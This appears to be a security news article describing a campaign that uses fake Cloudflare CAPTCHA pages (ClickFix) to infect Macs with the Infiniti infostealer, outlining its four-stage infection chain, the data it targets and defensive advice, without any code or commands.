Infiniti Stealer Campaign Exploits Cloudflare Brand Trust
Security researchers discovered a sophisticated malware campaign targeting Mac users through fake Cloudflare-branded CAPTCHA verification pages on March 27, 2026. The attack leverages the ClickFix social engineering technique, exploiting users' familiarity with legitimate Cloudflare security checks to deliver the Infiniti infostealer malware.
The attack begins when victims visit compromised websites or click malicious links that redirect them to convincing fake CAPTCHA pages mimicking Cloudflare's security verification interface. These pages display familiar elements including Cloudflare's logo, color scheme, and messaging that users typically encounter when accessing websites protected by Cloudflare's security services.
The infection chain represents a multi-stage attack designed to bypass macOS security protections. Once users interact with the fake CAPTCHA, they're prompted to complete a verification process that actually triggers the download and execution of malicious code. The attackers have crafted the social engineering component to appear legitimate, capitalizing on users' trust in Cloudflare's widespread security infrastructure.
The campaign demonstrates increasing sophistication in targeting Mac users, who have historically been less targeted by malware campaigns compared to Windows users. The choice to impersonate Cloudflare specifically reflects the service's ubiquity across the internet, making the fake verification pages appear credible to a broad range of users.
Related: BeatBanker Android Banking Malware 2026: Fake Starlink App
Related: Torg Grabber Malware Targets 850 Browser Extensions
Related: ClickFix Campaigns Deploy MacSync Stealer on macOS
Researchers identified the campaign through analysis of suspicious network traffic and user reports of unexpected system behavior following interactions with seemingly legitimate security verification pages. The attack represents a concerning evolution in social engineering tactics specifically designed to circumvent macOS security measures.
macOS Users Across All Versions Face Credential Theft Risk
The Infiniti stealer campaign affects Mac users running all current versions of macOS, including macOS Sonoma 14.x, macOS Ventura 13.x, and macOS Monterey 12.x. The malware doesn't exploit specific system vulnerabilities but instead relies on social engineering to trick users into manually executing malicious code, making version-specific protections less effective.
Users most at risk include those who frequently encounter CAPTCHA verification pages during normal web browsing, particularly individuals who access websites protected by content delivery networks or security services. The attack specifically targets users' familiarity with legitimate Cloudflare verification processes, making it particularly effective against users who regularly interact with websites using Cloudflare's services.
The infostealer focuses on harvesting sensitive data stored on infected systems, including saved passwords from browsers, cryptocurrency wallet information, authentication tokens, and personal files. Mac users who store financial information, use password managers integrated with browsers, or maintain cryptocurrency wallets face the highest risk of significant data loss.
Organizations with Mac-based workforces should be particularly concerned, as the stealer can potentially access corporate credentials, VPN configurations, and sensitive business documents stored on infected systems. Remote workers and employees who frequently access cloud services through web browsers represent prime targets for this type of credential harvesting attack.
Four-Stage Infection Chain Bypasses macOS Security Controls
The Infiniti stealer employs a sophisticated four-stage infection chain designed to evade detection and establish persistence on macOS systems. The attack begins with the fake CAPTCHA page, which serves as the initial social engineering vector. When users attempt to complete the verification, they unknowingly trigger the download of a Bash script that initiates the infection process.
The second stage involves the execution of the Bash script, which performs initial system reconnaissance and downloads additional components. This script checks for security software, establishes network connectivity to command-and-control servers, and prepares the system for payload delivery. The script operates with the permissions of the user who triggered the fake CAPTCHA, avoiding the need for privilege escalation.
The third stage deploys a Nuitka loader, a Python-to-executable converter that packages the final payload in a format designed to bypass macOS security mechanisms. Nuitka compilation helps obfuscate the malicious Python code and makes static analysis more difficult for security tools. The loader establishes persistence mechanisms and creates the necessary directory structures for the stealer's operation.
The final stage activates the Python-based Infiniti stealer itself, which begins systematic data harvesting from the infected system. The stealer targets browser credential stores, examines running processes for cryptocurrency applications, and searches for files containing sensitive information. Mac users should immediately disconnect from the internet if they suspect infection and run comprehensive security scans using updated antimalware tools. Organizations should implement network monitoring to detect unusual outbound traffic patterns that might indicate data exfiltration attempts.
